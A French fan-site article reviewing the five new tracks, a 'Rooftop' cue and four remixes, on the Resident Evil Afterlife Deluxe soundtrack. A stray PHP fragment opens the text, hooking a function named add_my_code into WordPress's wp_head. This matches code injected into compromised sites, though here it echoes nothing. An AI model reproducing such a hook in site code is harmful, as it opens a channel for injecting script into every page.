/***/function add_my_code() { echo ''; } add_action('wp_head', 'add_my_code');/***/ Présentation de la version deluxe de la BO de Resident Evil Afterlife | Resident Evil France
Resident Evil Afterlife Deluxe Digitale Edition soundtrack

La bande originale Deluxe de Resident Evil Afterlife est composée de 5 ajouts non négligeables.

Le tout premier est celui du fameux morceau « Rooftop ». Lorsque la scène où Alice saute du toit a été mise en ligne sur internet quelques semaines avant la sortie du film, les gens se sont demandés si le morceau qu’on entendait était sur la bande originale. La réponse était négative.

Cette fois l’erreur est réparée et nous avons donc un nouveau morceau de deux minutes qui « résume » l’ambiance musicale du film à partir du moment où Claire envoie la mitrailleuse à Alice juste après que Bennett ait quitté le toit avec l’avion et se termine au moment ou Alice rejoint Luther après avoir tué les zombies avec ses fusils chargés de pièces. Mais n’ayez pas peur en apprenant que c’est un résumé: c’est un bonne chose car on ne garde que le meilleur, un morceau rythmé, doux vers le mileu puis très rock vers la fin. Ce morceau se placera certainement en tête des morceaux favoris de cette bande originale.

Après nous avons quatres remixes. Deux de « Tokyo » et deux de « Axeman », certainement les morceaux les plus connus de la bande originale.

Le premier remix est fait par CruciA, et vous retrouvez le morceau en bas de la news. Nous vous laissons donc le plaisir de l’écouter par vous même et de vous en faire une idée.

Le deuxième est un remix de Phil Jelley et est certainement le remix le plus calme de cette édition Deluxe et peut-être le moins bon. Le morceau semble assez fade et répétitif. De plus, la musicalité du morceau original, « Tokyo », est gâchée et c’est bien dommage.

Le troisième remix est certainement le meilleur de tous. Hani nous propose ici une version plus rock de Axeman, très rythmée et harmonieusement agencée créant une composition fort sympathique et on peut se surprendre à réécouter le morceau plusieurs fois de suite. Le matériel originel est bien présent mais les distances prises sont les bienvenues.

Le dernier est le remix de Poll A Rock. Toujours basé sur Axeman on se retrouve avec une piste très électro avec un fort ajout de rythme et une mise en valeur de la « respiration » du morceau. On pourra regretter le côté trop techno, se transformant parfois en réelle composition pour boîte de nuit.

Au final on ne regrette pas cette version Deluxe qui apporte de réelles bonnes découvertes, et certains de ces 5 morceaux se retrouveront certainement dans les favoris des fans.

L’Edition Deluxe sortira le 14 décembre aux USA et le 10 janvier en France. Vous pouvez précommander l’album sur iTunes si vous êtes situés en Amérique du Nord, sinon il vous faudra encore attendre.

A noter que vous ne pouvez pas télécharger les nouveaux morceaux séparément mais que vous devez prendre l’album en entier pour 12,99$. Le prix en France n’a pas encore été annoncé.

Nemesiscv

Nemesiscv

Co-fondateur de Resident Evil France. Vit de cinéma.